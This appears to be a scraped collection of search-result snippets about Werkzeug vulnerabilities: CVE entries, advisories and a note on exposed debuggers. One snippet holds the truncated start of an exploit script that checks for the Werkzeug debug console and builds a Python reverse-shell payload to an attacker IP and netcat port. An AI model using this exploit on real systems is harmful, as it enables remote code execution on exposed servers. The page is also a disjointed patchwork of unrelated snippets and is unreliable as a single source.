Learn more about known Werkzeug 1.0.1 vulnerabilities and licenses detected.

Palletsprojects Werkzeug version 1.0.1 security vulnerabilities, CVEs, exploits, vulnerability statistics, CVSS scores and references

Security vulnerabilities and package health score for pip package werkzeug

Of course this doesn't prevent developers from mistakenly enabling it in production! Tested against the following Werkzeug versions: - 3.0.3 on Debian 12, Windows 11 and macOS 14.6 - 1.1.4 on Debian 12 - 1.0.1 on Debian 12 - 0.11.5 on Debian 12 - 0.10 on Debian 12

May 27, 2022 - CVE-2022-29361 - High Severity Vulnerability Vulnerable Library - Werkzeug-1.0.1-py2.py3-none-any.whl The comprehensive WSGI web application library. Library home page: https://files.pythonhosted.org/packages/cc/94/5f7079a0e00bd6863ef8f1...

This page lists vulnerability statistics for all versions of Palletsprojects » Werkzeug. Vulnerability statistics provide a quick overview for security vulnerabilities of Werkzeug.

January 28, 2018 - Vulnerable App: #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s

June 3, 2025 - We cannot provide a description for this page right now

We cannot provide a description for this page right now

February 18, 2020 - The issue here is not the Werkzeug debugger itself, but an incorrect way of configuring a Werkzeug application: making the debugger available on a production machine. A publicly exposed debugger will subject the machine to remote code execution.

Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.

This is a potential security issue, you are being redirected to https://nvd.nist.gov · Official websites use .gov A .gov website belongs to an official government organization in the United States

February 3, 2018 - This issue has been patched in version 3.1.4. Source: GitHub, Inc. ... Werkzeug is a Web Server Gateway Interface web application library. Applications using `werkzeug.formparser.MultiPartParser` corresponding to a version of Werkzeug prior to 3.0.6 to parse `multipart/form-data` requests (e.g. all flask applications) are vulnerable ...

Learn more about known werkzeug 0.1 vulnerabilities and licenses detected.

It was discovered that Werkzeug has insufficient debugger PIN randomness. An attacker could use this issue to access sensitive information. This issue only affected Ubuntu 18.04 LTS.

Security vulnerabilities and package health score for pip package Werkzeug 0.16.1

It was discovered that the debugger in Werkzeug was not restricted to trusted hosts.

We cannot provide a description for this page right now

October 25, 2017 - It was discovered that Werkzeug did not properly handle certain web scripts.

This is a potential security issue, you are being redirected to https://nvd.nist.gov · Official websites use .gov A .gov website belongs to an official government organization in the United States